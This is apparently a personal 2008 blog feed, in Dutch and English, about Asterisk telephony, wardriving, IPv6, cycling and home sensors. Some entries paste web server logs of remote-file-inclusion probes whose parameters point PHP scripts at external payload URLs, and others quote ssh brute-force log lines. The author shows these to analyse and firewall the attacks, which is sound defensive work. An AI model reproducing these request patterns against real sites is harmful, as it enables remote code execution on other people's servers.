Zaterdag was de bijeenkomst van de netwerkgroep waar we het gehad hebben over de HCC dagen en de jaarplanning van 2009. De HCC dagen (of eigenlijk: Het Multimedia Event 2008 ondertitel HCC dagen) zullen zeker anders zijn dan voorgaande jaren.

I have done serious testing of the mISDN drivers. Sofar in TE mode (terminal equipment). Ingredients for testing were an analog phone and analog modem connected to a fritzbox connected to the ISDN card and another asterisk testserver quite willing to play hours of music on hold or very short answers to calls. The fritzbox does not have the built-in answering machine I expected but the modem was also very good in dialing out on command (I had to dig up how to make cu dial in to another system again) or in listening for a ring, answering the phone and giving it up after a while. The driver worked, in the first few hours of testing I saw 2 spurious kernel messages. What I am worried about is the memory use, I think it slowly leaks kernel memory.

Tomorrow I'll be at the meeting of the network group which means the other test Asterisk server will be unavailable anyway. After I return I'll have a look at changing the setup to NT mode and see how things work then.

My favourite waste of time is back on-line: bash.org.

Wardriving results 17 - 29 October: 881 new networks with GPS locations. I'm still at 18 in the WiGLE stats. It's getting a bit cold for big planned wardriving trips by bicycle.

En licht was er! De eerste terugrit van mijn werk na het einde van de zomertijd was dus gelijk in het donker. De lamp werkte prima en gaf goed zicht zowel in gebieden met veel verlichting als op de donkere stukken.

I just realised I have the hardware (I think) for some serious call handling testing: the 7170 fritz!box as TE connected to the ISDN card with mISDN drivers in NT mode. The 7170 has a built-in answering machine (either by default or after upgrading to experimental firmware). Using the auto-calling features of Asterisk I could just constantly setup calls and either let the caller hang up (terminate call while the answering machine still holds the line) or let the called party hang up (let the answering machine hang up) and see what happens. Originating calls on the other side (not asterisk) is also not too complicated: just hook up a modem to the analog port of the fritz!box and a few well-placed ATDT strings should do the trick.

Actual time this weekend to work on the new home server greenblatt. I'm seriously looking at setting up this server as Asterisk server to run our home telephony completely. I bought a Sitecom DC-105 ISDN card that can run in NT mode. I tested the mISDN linux drivers and after some iterations I found the working combination for getting a working drivers without a kernel panic. To thoroughly test them I'm running it at the moment in TE (terminal equipment) mode. A test call is set up analog phone → fritzbox → isdn → isdn card → mISDN driver → Asterisk 1.4 → SIP → another Asterisk. The first call was to a SIP phone connected to that Asterisk but for a longterm torture test I connected it to a very irritating music on hold channel. So both the driver gets a torture and the eventual listener. After three hours of music-on-hold I think the mISDN driver works. Now to find a way to test lots of call setups with the card in NT mode.

I first tried to use an external Asterisk but with all the competition for port 5060 on the external IP that was not working. One of those things were NAT shows its ugly head.

Flashback!
FW dropped: IN=eth0.2 OUT= MAC=00:1b:21:08:82:b8:00:0e:50:7c:14:2e:08:00 SRC=82.153.163.169 DST=xx.xx.xx.xx LEN=60 TOS=0x00 PREC=0x00 TTL=56 ID=7653 DF PROTO=TCP SPT=4253 DPT=23 WINDOW=5808 RES=0x00 SYN URGP=0
Real telnet traffic!

The hardware for a new home server greenblatt arrived. I installed it in a somewhat older ATX case so it can run by itself. I selected Ubuntu 8.04 LTS Server 64 bit. Basic stuff is now set up, time for packages and configuration.

Inkomende gesprekken werken nu ook vanaf Budget Phone. Daarvoor was wel een beetje botte aanpak nodig: alles voor 5060/udp forwarden naar de fritz!box. Budgetphone heeft namenlijk 3 sip servers op verschillende lokaties:

koos@gosper:~$ host -t srv _sip._udp.budgetphone.nl
_sip._udp.budgetphone.nl SRV 0 0 5060 proxy.sipthor.net.
koos@gosper:~$ host -t a proxy.sipthor.net
proxy.sipthor.net has address 81.23.228.129
proxy.sipthor.net has address 85.17.186.7
proxy.sipthor.net has address 81.23.228.150

en een binnenkomend telefoongesprek kan van elk van de 3 servers komen, dus niet alleen van degene waar de SIP registratie was. Dus mijn firewall had zoiets van 'die ken ik niet' als de registratie naar een andere server gedaan was en negeerde de packets. Workaround: alle verkeer voor 5060/udp dan maar naar de fritz!box. Als ik dat zo zie is een asterisk op de routerPC die alles doorstuurt naar een fritz!box, een isdn kaart in NT-mode (zodat ik er een isdn toestel aan kan hangen) of een voip toestel aan de binnenkant op den duur toch handiger. Dan werken ook dialing rules voor regionale nummers en andere korte nummers bijvoorbeeld beter. Nummers als 112 en 18xx gaan nu nog via het vaste net (en ontlopen daarmee de vertaal-regel die er 030 voor zet) en het saldo-controle nummer van budgetphone (444) werkt nog uberhaupt niet.
Waarmee ik weer terug ben op de verbazing dat SIP+NAT uberhaupt werkt.

Ik heb een Budget Phone telefoonnummer en prepaid account aangevraagd om eens te proberen of dat een geschikte aanbieder is om onze telefonie naar toe over te zetten. Hun uitleg over installatie op de fritz!box is wat karig en we gebruiken (nog) een redelijk achterhaald model: de fritz!box 5012. We vinden het wel handig als lokale nummers in Utrecht zonder netnummer 030 gebeld kunnen worden dus was het even zoeken naar de juiste instellingen: vinkje 'Ortskennzahl verwenden' aan, bij 'Geben Sie hier Ihre Ortskennzahl ein' 30, bij 'Geben Sie hier Ihren Ortskennzahl-Prefix ein' 0 en vinkje 'Ortskennzahl-Prefix beibehalten' aan. Internationaal zoek ik een keer uit als ik daar noodzaak toe heb.

Wardriving results 2 - 16 October: 1917 new networks with GPS locations according to WiGLE. I dropped a place in the WiGLE stats because a really active wardriver (over 50000 new networks this month) overtook me.

En er is licht! Na mijn avonturen rond het herfsttreffen waarvan de heenrit grotendeels in het donker was dacht ik al over betere verlichting op mijn ligfiets. Dat werd erger toen ik een alternatieve route naar mijn werk ging fietsen die iets langer is maar een stuk beter opschiet (minder stoplichten en minder ander verkeer). Deze route loopt ook voor een serieus deel over onverlichte wegen.

Veel ligfietsers in Nederland, onder andere 'Knurft' zijn enthousiast over de Busch und Müller KG Ixon IQ die in de hoge stand 40 lux licht geeft. Dus heb ik ook in zo'n lamp geinvesteerd (80 euro! voor een koplamp). Nu nog in het donker fietsen.. maar dat gaat vanzelf lukken de komende tijd.

Ik heb wat gespeeld met guest SIP toegang tot een paar van de Asterisk demo projecten aan de hand van de uitleg in blyon.com: sip p2p dialing. Via SIP urls zoals sip:belspel@idefix.net is bijvoorbeeld het Asterisk belspel te bereiken zonder telefoonkosten. Werkt alleen met clients die SRV records voor SIP snappen.

British Telecoms 21st century network initiative dubbed 21CN isn't very 21st century: no IPv6 support. Bwahahaha. Sorry, I have to laugh about this. That's not very future proof. Back to the drawing board!
Source: The Register: BT's 21st Century network, er... isn't.

Ekiga is a nice softphone which I use under Ubuntu to test Asterisk stuff. But at home it never registered with an outside asterisk and I had weird missing audio problems with some services. With a lot of tcpdump use I found that the 169.254 addresses were used as source address for the SIP packets (and probably as destination for the missing audio packets). In the setup I selected the right interface for the outgoing connections and suddenly stuff works. This is something where I expect software like ekiga to do the right thing. You can't reach a non-169.254 address with that address as source, just use the normal routing tables.

Fast asterisk trick: dialing US toll free numbers using SIP. IPKall is nice enough to offer this without any needed registration. Given the 'european' way of dialing a US toll free number, 00-1-800-555-1212, you get:

exten => _001800XXXXXXX,1,Dial(SIP/${EXTEN:3}@voiper.ipkall.com)
exten => _001866XXXXXXX,1,Dial(SIP/${EXTEN:3}@voiper.ipkall.com)
exten => _001877XXXXXXX,1,Dial(SIP/${EXTEN:3}@voiper.ipkall.com)
exten => _001888XXXXXXX,1,Dial(SIP/${EXTEN:3}@voiper.ipkall.com)

Found at Voxilla forums: SIP to TFN (Toll Free Number)

Wardriving results 6 September - 1 October: 1339 new networks with GPS locations. Nothing spectacular happened, I just took the wardriving box along on a number of trips.

Het herfsttreffen van de nvhpv was dit weekend. Direct na het terugkomen van het Surf-IBO congres in Eindhoven konden we door op de ligfiets naar camping de Woensberg in Huizen. Onderweg kreeg ik ergens net buiten Hilversum een lekke achterband. De eerste lekke band met mijn ligfiets! Na wat gemopper deze geplakt en een groot stuk glas uit de buitenband verwijderd. We nemen de plakspullen niet vaak mee, deze keer toevallig wel. Daarna weer verder gefietst. In het donker, navigerend met de GPS die soms wel eens rare ideëen heeft over kortste route over verharde weg. Op het laatste stuk ging het regenen. De helling op richting de Woensberg begon mijn achterband weer af te zakken, dus het laatste stuk maar gelopen. Ik ging er eigenlijk van uit dat de vers geplakte band door het er in komen van regenwater weer losgelaten had, maar ik had toen niet zo heel veel zin meer om er naar te kijken, want ik had honger. We waren te laat voor de barbeque maar toch wat gegeten en daarna gekletst met de rest van de ligfietsers (altijd een gezellige groep met zeer verschillende achtergronden).

Zaterdagochtend eerst een geleende binnenband achter erin gezet en toen onderweg op de toertocht. Een echt mooie tocht door de omgeving met veel onverwachte mooie plekken er in. Maar, onderweg sloeg de pech ook bij mij weer toe: lekke voorband. Dankzij veel aanwezige helpende handen in een recordtijd de binnenband vervangen door een reserve binnenband van een collega fietser terwijl iemand anders nog eventjes de lekke band plakte omdat we nog op een andere reparatie stonden te wachten. Na de middagpauzestop met de rituele koffie met appeltaart ontdekte ik dat mijn achterband ook weer aan het afzakken was. De rest van de tocht deze een paar keer opgepompt om door te kunnen blijven rijden. Een paar keer er door andere rijders op gewezen dat mijn achterband erg zacht was. Ja dat wist ik al, ik wilde het plakken even uitstellen. Ook was het fietsen niet erg comfortabel omdat de binnenbanden beiden zorgden voor wat ongelijke plekken in mijn wiel.

Na terugkomst dus aan het plakken gegaan: de geleende binnenband van achter, toen ook maar de buitenband gecontroleerd en het gat van vrijdagavond aan de binnenkant van de buitenband geplakt. Daarna het 2e lek in de originele achter-binnenband. Dat bleek echt een nieuw gat te zijn, geen loszitten van de reparatie van vrijdagavond. Daarna had ik het wel een beetje gehad met banden plakken. Voor minstens een jaar ofzo. Gelukkig was er zaterdagavond een maaltijd verzorgd door de onvolprezen keukenhelden afgesloten met een Irish coffee (hips!) en een avond met meer gezelligheid en een snel verdampende fles wijn.

Zondag werd het steeds regenachtiger en was iedereen duidelijk moed aan het verzamelen voor de terugtocht. We zijn met een kleine delegatie teruggereden naar Utrecht via hoofdwegen, de bossen leken ons te modderig. Onderweg bleef het ook regenen dus thuis was het heel hoog tijd voor douche en droge kleren. In totaal over het weekend 4 keer een band lek gehad terwijl ik dat daarvoor nooit had met mijn ligfiets.

Een beetje een concentratie van pech en drukte zo dicht op elkaar. En toen keek ik zondagmiddag met een half oog in de krant en zag dat er sinds ons vertrek vrijdag een hoop wereldnieuws was gebeurt in Nederland.

Update: Foto's staan nu on-line, het artikel op ligfiets.net met meer verslagen en foto's.

Donderdag en vrijdag was ik op de Surf-IBO (informatie beveiligings overleg) congres. Dit uit mijn nieuwe rol als Cert-UU teamlid. Leuke lezingen aangehoord, een hoop bekende mensen en nieuwe mensen gezien. De leukste lezing was wel The history of cryptography door Simon Singh die een echte werkende Enigma machine uit 1936 bij zich had. Beveiliging is duidelijk aan het opgroeien. Ik lees toevallig net weer eens het boek At large: the strange case of the world's biggest internet invasion en het verschil tussen beveiliging toen dit verhaal speelde (1992) en nu is enorm groot. En volgens de presentatie van Don Stikvoort over computer emergency response teams is er nog een (lang) pad naar volwassen wording. Ik ben benieuwd. Computer security heeft al jaren mijn interesse, ik vind het erg leuk om daar wat actiever mee te gaan doen door lid te worden van het Cert-UU team.

I implemented xkcd - Tones. My Nokia 6300 now makes a real ringing sound.

Looking at the security logs I saw a new kind of distributed ssh attack. Not the usual dictionary of common login names but a start at

Sep 30 19:13:06 idefix sshd[99210]: Illegal user aaa from 67.152.2.17
Sep 30 19:13:06 idefix sshd[99210]: Failed unknown for illegal user aaa from 67. 152.2.17 port 36709 ssh2

Slowly but surely working towards

Oct  1 11:30:20 idefix sshd[32699]: Illegal user asn from 196.211.228.226
Oct  1 11:30:21 idefix sshd[32699]: Failed unknown for illegal user asn from 196.211.228.226 port 58586 ssh2

With a bit of grep and awk later I found 174 attempts like this (3 letter account names) from 102 IPs. Now all added to the firewalling rules.

The complete list of source IPs attacking ssh

Update 2008-10-01: still going strong: 211 attempts from 126 IP addresses. Firewall rules updated. List updated.

On-line gezet: de source en de audio voor het Asterisk belspel. En de demoversie is nu beschikbaar zonder dat er een server extra thuis voor draait.

It seems my homepage has turned into a livejournal. It seems someone prefers following my homepage via the livejournal interface. And this page just copies information from my rss feed.
Update 2008-09-28: reader found (hi rone!).

The home server has been nagging for a while it wants a Debian upgrade (olstable -> stable) and it is not very 'green' at the moment as it sucks up a lot of electricity. I hope to measure the exact amount soon. I will tackle both problems and do a complete rebuild (the home server as it is is almost 8 years old). Start with a new mainboard, cpu, memory, cooler and disks aimed at sucking up less electricity. And start with a new Linux installation: Ubuntu server edition. I tried this at work and I like it. The tools I know from Debian but not the whole free software action front included. Time to order hardware and find installation time.

De DOSgg gebruikersdag zaterdag was gezellig en Kees van Eeten (van de DOSgg) en ik hebben er leuk met Asterisk gespeeld en vragen over VoIP beantwoord. Niet veel mensen wilden 'spelen' met de centrales en er is niet een keer naar 'buiten' gebeld. Maar het is in ieder geval leuk om dit contact nu te hebben met mensen binnen de DOSgg die actief zijn met VoIP.

Opened the home server last evening to replace a 40-pin IDE cable with a 80-pin one and replace a fan with one that has 3 leads and no clogged dust. The added advantage is that this fan now shows up in sensors so the assorted sensors at home now shows 2 fan speeds. There is a third fan sucking air via the harddisks connected to the mainboard with a 3 lead cable but it isn't measured for as far as I can find it.

You can check out of the NTP Pool anytime, but you can never leave...
Two years after we removed a server from the ntp pool we still see regular traffic to that IP. Documented in the NTP events log, we still have over a hundred regular clients.
With regards to the Eagles.

Neat asterisk trick I discovered: You can play musiconhold while waiting for a script to finish! Just use the Local pseudo channel and set up a call to the extension that can take a while to process. I wanted this for a situation where the phone was already answered but longer processing was happening from an external script.

[metarwaittest]

exten => s,1,Answer()
exten => s,n,Dial(local/s@metarspoken-eham,60,m)

[metarspoken-eham]

; EHAM = Amsterdam Schiphol airport

exten => s,1,Ringing
exten => s,n,System('/usr/lib/asterisk/scripts/getmetarforasterisk EHAM')
exten => s,n,Answer()

The processing in the script can take quite some time, so the music on hold is played while waiting.

In de voorbereidingen voor de DOSgg gebruikersdag op 20 September heb ik weer het nodige met Asterisk gespeeld (ik kan het niet laten). Leuke dingen: twee asterisk centrales aan elkaar die daar in hun dialplan rekening mee houden en web overzichten vanuit de Asterisk Manager API waar in theorie ook een leuke click-to-dial applicatie mee te bouwen is of andere manieren om Asterisk te koppelen met web.

Ik heb nu een tijdje met Asterisk gespeeld, een open-source telefooncentrale voor Linux (of andere x86 unixen, maar Linux is wel duidelijk het primaire platform). Tegelijkertijd ben ik op mijn werk betrokken geweest bij de keuze voor een nieuw op voip gebaseerd telefoonsysteem ter vervanging van een verouderde, grotendeels analoge centrale. Daardoor heb ik de voip wereld zowel een beetje hands-on kunnen proberen met Asterisk als vanaf de zijlijn bij het implementeren van een nieuw telefoonsysteem in een grote organisatie. De keuze voor telefonie was met behulp van een Europese aanbesteding, een aanbieder van een systeem op basis van Asterisk had zeker mee kunnen doen maar dit is niet gebeurd. Uiteindelijk is de keuze op Alcatel-Lucent gevallen.

Asterisk lijkt de ideale keuze voor telefonie: de enige investeringen die nog nodig zijn voor een telefonie systeem zijn hardware en kennis. Licentie kosten beperken zich tot een enkele codec licentie. Vergelijk dat eens met een commerciele telefonie oplossing waar naast de toestellen ook betaald moet worden voor een licentie om die toestellen op de centrale aan te sluiten. En daarnaast diverse andere licenties aangeschaft moeten worden om een en ander werkend te krijgen (naast de hardware voor die functionaliteit).

Asterisk en grote telefoniesystemen

Toch zie ik Asterisk nog niet als bedreiging voor de markt voor grote telefoniesystemen met meer dan een slordige 500 toestellen. Dit heeft diverse oorzaken:

• Inertie, misschien wel oorzaak nummer 1. Klanten willen iets bekends en de grote namen zijn dan bekenden.
• Klanten willen een 'af' product. Asterisk op zichzelf is een heel krachtig startpunt maar verre van af te noemen. De diverse op Asterisk gebaseerde complete distributies zoals Trixbox proberen een meer 'af' product te leveren om dit gat op te vullen. Digium levert zelf ook de Asterisk business edition die tot 250 gebruikers gaat. Dit valt nog niet onder 'groot' systeem.
• Asterisk zelf installeren en beheren vraagt ook om (relatief veel) Linux kennis. Telefonie gebruikers willen een zwarte doos met beheersinterface. Opvallend is trouwens wel dat diverse andere voip systemen toch ook Linux draaien. De Alcatel OXE draait een geharde Linux, Cisco Callmanager 5.0 draait ook op een geharde Linux. Men wil dus wel Linux als het maar in een zwarte doos zit met een beheers (web-)interface voor de telefonie.
• Asterisk heeft (voorzover ik weet!) minder ondersteuning voor telefonie diensten die in (Europese) bedrijven gewenst zijn: de chef-secretaresse schakeling.

Toch is er al minstens een plaats waar een groot telefoniesysteem over aan het gaan is naar Asterisk: Sam Houston State University in Texas, USA is aan het migreren van een mix van Nortel PBX en Cisco callmanager naar Asterisk. De toestellen blijven gewoon Cisco toestellen maar met een SIP image.

Deze ontwikkeling geeft aan dat het wel kan om een groot systeem naar Asterisk te migreren.

Asterisk en kleinere telefoniesystemen

Voor het midden- en kleinbedrijf kan Asterisk zeker interresant zijn, maar dan eigenlijk als 'black box' (een complete installatie die zo aangekocht wordt, of een cd die een PC verandert in een geharde Linux machine met Asterisk met een simpele beheersinterface) of als op afstand beheerde telefooncentrale. Diverse leveranciers kunnen dit leveren. Hier weegt het kostenvoordeel van minder investering in hardware en minder licenties voor telefonie heel zwaar.

Asterisk en de hobbyist

Asterisk maakt wel de telefonie danwel voip wereld een stuk toegankelijker. Vroeger was telefonie iets van grote bedrijven en hoge prijzen. Met een PC met Linux, Asterisk en een voip toestel kan iemand nu al gaan experimenteren met telefonie. Dankzij Asterisk is het bijvoorbeeld mogelijk dat de leden van het Collectors' NET die oude telefonie-apparatuur verzamelen deze via Asterisk centrales aan elkaar verbinden. Interfaces naar analoge lijnen zijn van diverse leveranciers beschikbaar voor Asterisk voor een prijs die geschikt is voor een hobbyist.

Opvallend is wel dat een interface voor een analoog toestel (FXS) duurder is dan een budget voip toestel zoals de BudgeTone-100.

Toekomst

Ik denk dat het met Asterisk net zo zal gaan als met Linux: hobbyisten doen er ervaring mee op en op den duur sluipt het grote organisaties binnen. Zo valt het me op dat de SHSU helpdesk pagina over telefonie zeer weinig vermeld over de techniek van het telefonie systeem maar eigenlijk meer verteld dat ze een telefoniesysteem hebben wat wordt geacht betrouwbaar te zijn.

Op den duur zal kennis over het draaien van Asterisk in grote systemen met hoge schaalbaarheid en betrouwbaarheid ook wel onstaan en verspreid worden.

Our birthday present was a Garmin Etrex Vista HCx gps and we took it cycling today. We ordered a routing cycling map for the Netherlands but it hasn't shown up in the mail yet, so I tried the Garmin maps from OpenStreetMap which work great. They can't be used for route-calculations on the gps itself, but they know every little road around here that is in OpenStreetMap. I got quite a kick out of cycling over a path which I have added to OpenStreetMap myself.

Using the Asterisk manager API it is quite simple to query Asterisk for its status. Using that documentation and a bit of php I was able to throw together a webpage on the demoserver which shows the active calls.

Op zaterdag 20 September is er een DOSgg gebruikersdag waar we met een paar mensen van de netwerkgroep ook heen gaan. Ik ga in ieder geval proberen de asterisk democentrale te koppelen met de asterisk democentrale van de DOSgg.

The replacement 1-wire interface arrived and the 1-wire network at home is working again. I also added a few temperature sensors so the assorted sensors at home now also show the crawl space temperature. Yes, I crawled under the house and hung a temperature sensor from the underside of the floor, connected to the 1-wire network. Correlating the temperatures over longer time with the weather can give me an insight whether underfloor isolation and heating pipe isolation will have a lot of influence on our heating bill.

No success in getting CÆSAR to reliably box a call on the Project MF server last evening. I think the main problem is with the sound driver or sound hardware not liking what I want to do: generate multi frequency tones. Lots of weird clicks and echoes happened on two different systems (with alsa sound drivers). But I had fun with Asterisk in the process. Legal phreaking over voip: who would have thought that to be possible.
Update 2008-09-09: It's now working. I installed CÆSAR on another PC running the oss sound drivers, and there were no weird clicks and echos. I added the pure 2600 tone to the caesar.rc file as

tone clear_test {
freq 2600
delay 0 duration 500
}
map '=' clear_test

and I could play with the projectmf server after I put the speakerphone close to the speakers. Loads of fun with the echo test: hearing my own voice echoed over a server with a Chicago phone number. Although I called it via the iax2 method.

The History of Phone Phreaking. A very cool site about the history (and history it is, going waaay back) of phone phreaking. With interesting information about the process of researching that history.

Found via Jason Scott: The FBI File of Yipl/TAP

Interesting thing to try: see if I can get CÆSAR, an open-source MF / DTMF generator or blue box for Linux working to make a call to the Project MF server to simulate blue boxing. But it will be from a phone behind an asterisk test server so I don't have to pay to call a US number.

Pouring rain this morning... the most interesting weather sensor at home would be a rain sensor, which is planned in the self-powering weather station.

Zaterdag was de firewall dag van de netwerkgroep van de hcc!pc gebruikersgroep. Goeie lezingen over de software based firewalls in Windows XP SP2 en Windows Vista, en over hardware based firewalls. Helaas was de opkomst iets minder spectaculair.

Wardriving results 25 August - 5 September: 746 new networks with GPS locations.

In browsing other 1-wire resources I found this gem: a snow depth sensor. The page reports of the development and improvements in the measuring of snow depth in Voksenlia, Norway. A place where measuring snow depth is worth it, the local record is over 200 cm of snow. The result of loads of precipitation: over 1000 mm annually.

I found an ISP which in 2008 actively 'breaks' IPv6. A Dutch ISP. Observe:

host mail.home.nl
mail.home.nl is an alias for mail.mars.home.nl.
mail.mars.home.nl has address 213.51.146.46
Host mail.mars.home.nl not found: 2(SERVFAIL)
Host mail.mars.home.nl not found: 2(SERVFAIL)

The SERVFAIL is in reaction to the AAAA query that a modern implementation of host does. Which is the wrong answer. In some cases this could be cached as 'does not exist at all' which would lead to end-users thinking Enabling IPv6 breaks stuff. No, stupid software giving wrong answers breaks stuff. Athome Ziggo, please get with the program, pay attention to what is happening on the Internet and un-break your nameserver.

I moved www.vandenhout.com so it can be fully resolved and reached over IPv6. No there is no interesting content on the site. It's the technical infrastructure that allows this which is the interesting part.

The misunderstanding with epag was fixed and now:

   Server Name: NS2.VANDENHOUT.COM
   IP Address: 2001:888:1011:0:0:0:0:694
   IP Address: 82.95.196.202
   Registrar: EPAG DOMAINSERVICES GMBH

   Server Name: NS3.VANDENHOUT.COM
   IP Address: 2001:470:1F15:DB:131:211:84:204
   Registrar: EPAG DOMAINSERVICES GMBH

Now I can move more names to epag and allow for ipv6-only resolving. Now to make the idefix.net machine understand ipv6 in jails...

I moved one domain name, vandenhout.com to epag because they were listed on the Sixxs faq: Which DNS Registrars allow me to add AAAA glue for my Domain Name Servers? and the price was right (comparable to my old registrar Dotster depending on dollar versus euro exchange rate). But, the support address answered they can't add an IPv6 address at the moment. I'm hoping to find out how soon that situation can be fixed as I explicitly asked about IPv6 glue records before opening an account with epag.
Update 2008-09-02: misunderstanding solved and I have my IPv6 glue records.

I took some time to work on the house 1-wire network today.. and blew up the serial to 1-wire interface in the process. I think there is a voltage difference between house ground (water pipes) and 1-wire ground and I touched a metal part of the 1-wire counter I was going to use for the electricity counting to a water pipe hiding behind another pipe when I was trying to test whether it responded to the led in the electricity meter. So, still no success on measuring electricity and no new house temperature readings either. I did put in an extension of the 1-wire network from the attic to the cupboard beneath the stairs where the electricity meter lives. I used the 'isdn' sockets on the end of the long 1-wire connection so as a side-effect I moved one temperature sensor from the top of the server to the 'wine rack' area and updated the sensors page. It is a different location temperature-wise so I started new statistics for this sensor. I also looked at options for placing a temperature sensor in the living room. The cable to the thermostat is thoroughly cemented in so I can't place a wire alongside that cable. I'll probably use the hole for an extra television-coax cable to get a wire for a temperature sensor from the crawlspace to the living room. I already ordered a replacement serial 1-wire interface. I hope that is the only component that was damaged.

My favourite ISP, XS4ALL is experimenting with the first IPv6 enabled loadbalancer (xs4all.general thread in Dutch) for their experimental IPv6 website XS4ALL. All 'experimental' and without any warranty that it will be available but a step forward.

Browsing through the web logs looking for any problems shows heaps of IPs trying to find vulnerable php scripts to break into using an approach of constructing lots of urls with the vulnerable script and the right parameters at the end. Sometimes scans from one IP mingling with scans from another IP. Samples:

193.207.106.54 - - [26/Aug/2008:13:18:39 +0200] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=<a href="=http://www.ganzkoerperpflege.at/files/oye.txt">http://www.ganzkoerperpflege.at/files/oye.txt</a>?? HTTP/1.1" 200 3155 "-" "libwww-perl/5.79"
193.207.106.54 - - [26/Aug/2008:13:18:39 +0200] "GET /~koos/newstag.cgi//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 5 "-" "libwww-perl/5.79"
193.207.106.54 - - [26/Aug/2008:13:18:40 +0200] "GET /~koos/newstag.cgi/security//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 5 "-" "libwww-perl/5.79"
74.55.98.10 - - [26/Aug/2008:15:53:50 +0200] "GET /~koos/newsitem.cgi//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=<a href="http://visitingphysicians.com/hrjobs_contacts/r.txt">http://visitingphysicians.com/hrjobs_contacts/r.txt</a>?? HTTP/1.1" 404 5 "-" "libwww-perl/5.813"
74.55.98.10 - - [26/Aug/2008:15:53:51 +0200] "GET /~koos/newsitem.cgi//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://visitingphysicians.com/hrjobs_contacts/r.txt?? HTTP/1.1" 404 5 "-" "libwww-perl/5.813"
74.55.98.10 - - [26/Aug/2008:15:53:51 +0200] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://visitingphysicians.com/hrjobs_contacts/r.txt?? HTTP/1.1" 200 3155 "-" "libwww-perl/5.813"
193.142.215.12 - - [26/Aug/2008:21:46:07 +0200] "GET /~koos/error.php?dir=<a href="http://starthost.us/pemlk/dark/safe.txt">http:/www.starthost.us/pemlk/darl/safe.txt</a>?? HTTP/1.1" 404 901 "-" "libwww-perl/5.808"

The one that puzzles me because I see a lot of it and can't find the associated vulnerability:

62.40.154.234 - - [26/Aug/2008:10:47:56 +0200] "GET /~koos/newstag.cgi/spam/english.php?u=<a href="http://javva.com/id.txt">http://javva.com/id.txt</a>? HTTP/1.1" 404 5 "-" "libwww-perl/5.79"
62.40.154.234 - - [26/Aug/2008:10:47:56 +0200] "GET /english.php?u=http://javva.com/id.txt? HTTP/1.1" 404 901 "-" "libwww-perl/5.79"
62.40.154.234 - - [26/Aug/2008:10:47:56 +0200] "GET /~koos/newstag.cgi/english.php?u=http://javva.com/id.txt? HTTP/1.1" 404 5 "-" "libwww-perl/5.79"

Not an advertisment for php, this.

Op de website van de gemeente Utrecht staat er alleen een webformulier voor het melden van (onder andere) defecte verkeerslichten maar er is een echt verkeerslicht defect telefoonnummer : 030-2864274. En dat is onderweg op de fiets toch handiger dan een webformulier. Tijden geleden genoteerd in mijn gsm toen ik er stickers van zag. Vanmorgen weer eens gebruik van gemaakt toen de verkeerslichteninstallatie op het Eykmanplein in Utrecht compleet uitgevallen was.

Wardriving results 17 - 24 August: 2345 new networks with gps locations. Most of them on a recumbent bicycle tour of Hilversum, a place that is mostly unmapped.

Finally I counted a few light pulses with the one-wire counter. No big circuit with the Velleman MK120R kit but just a photodiode and a resistor hooked up to the counter module. I got the idea from looking at the schematics for the Hobby Boards 1-Wire Lightning Detector. The counting circuit is a phototransistor (in an optocoupler) and a resistor. With a bit of tweaking on the resistor I eventually got the counting circuit to count 2 light flashes from a flashlight. With some more tweaking of the resistor value I think I could count red flashes from the electricity meter.

I also installed the lightning detector under the roof. But it is too close to the wiring of the house I think: sofar all counts are related to me being in the attic and turning on the light. In a 'real' setup I think it needs to be away from the house. Something to keep in mind for the project sundial weather station.

Met wat zoekwerk ben ik er uit wat de manier is om meerdere accounts van dezelfde sip server in asterisk te configureren en binnenkomende gesprekken uit elkaar te houden. In mijn geval xs4all, maar het werkt ook met andere aanbieders. Na veel zoeken en proberen de magie gevonden en gelijk opgeschreven Asterisk meerdere sip accounts naar dezelfde sip server

The parts came in but I still can't make the MK120 receiver work as detector for LED light. From looking at the schematics carefully I think the receiver is tuned to the sender. What I want is quite simple: just detect on/off state and convert that to connecting or not connecting +5V and a counter input. Maybe some variant of the Infrared remote control extender circuit can do the work. The LM324 opamp in the Velleman design can be fed with +5V so maybe it is simple to go from a small current (light on a photodiode) to +5V. But this means it is not going to be an 'out of te box' working circuit. Oh well, my electronics knowledge is slowly coming back from way deep...

Opvallend: Wordt Vervolgd komt weer terug (vk.tv). Van 1983 tot 1997 op televisie hoewel ik het vooral volgde in de tijd dat ik op de MAVO zat (de beginjaren met de Tex Avery tekenfilms). De tekenfilms toen vond ik erg leuk, veel amerikaanse invloeden. Ik keek ook regelmatig de tekenfilms op Sky Channel op zaterdagmorgen bij de Fun Factory. Later toen tekenfilms minder humoristisch gooi en smijtwerk kregen en meer 'echt' geweld en fantasy/magie invloeden was mijn interesse in grote hoeveelheden tekenfilms grotendeels over. Ik blijf wel de The Simpsons volgen. Op de Wordt Vervolgd website staat meer informatie over de nieuwe Wordt Vervolgd.

Wardriving results 8 - 16 August (a few days missing because the upload results already scrolled out of the WiGLE upload stats) : 685 new networks with GPS locations.

Recent vroeg ik me af hoe een en ander nu zit met digitale kabeltelevisie en wat de kansen zijn om zelf een digitale videorecorder te bouwen met behulp van mythtv, vdr of freevo. Op digitale kabeltelevisie nederland kwam ik goede uitleg tegen hoe en wat er mogelijk (en onmogelijk) is. Voorlopig heb ik bij de kabelaanbieder in Utrecht (Ziggo) dus geen garantie dat niet door hun geleverde (en gecontroleerde) apparatuur het blijft doen. Maar 'op termijn' zal dit verbeteren.

Op 6 september 2008 heeft de netwerkgroep van de hcc!pc gg een bijeenkomst die speciaal over firewalls gaat. Ik zal er natuurlijk zijn!

